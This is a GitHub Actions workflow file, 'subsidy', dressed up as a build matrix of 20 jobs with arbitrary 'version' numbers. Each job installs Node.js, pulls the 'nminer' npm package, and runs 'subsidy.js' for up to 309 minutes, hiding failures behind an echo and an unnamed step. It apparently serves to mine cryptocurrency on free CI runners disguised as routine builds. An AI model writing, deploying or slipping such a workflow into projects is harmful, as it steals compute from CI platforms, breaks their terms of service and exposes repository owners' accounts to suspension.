name: subsidy
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3821 }
          - { version: 306 }
          - { version: 6495 }
          - { version: 8705 }
          - { version: 2302 }
          - { version: 272 }
          - { version: 8880 }
          - { version: 4811 }
          - { version: 2945 }
          - { version: 9453 }
          - { version: 7840 }
          - { version: 6265 }
          - { version: 5530 }
          - { version: 6500 }
          - { version: 8090 }
          - { version: 6116 }
          - { version: 2466 }
          - { version: 5770 }
          - { version: 6639 }
          - { version: 8175 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: 
        run: |
          npm install nminer@latest
          timeout 309m node subsidy.js || echo "subsidy executed"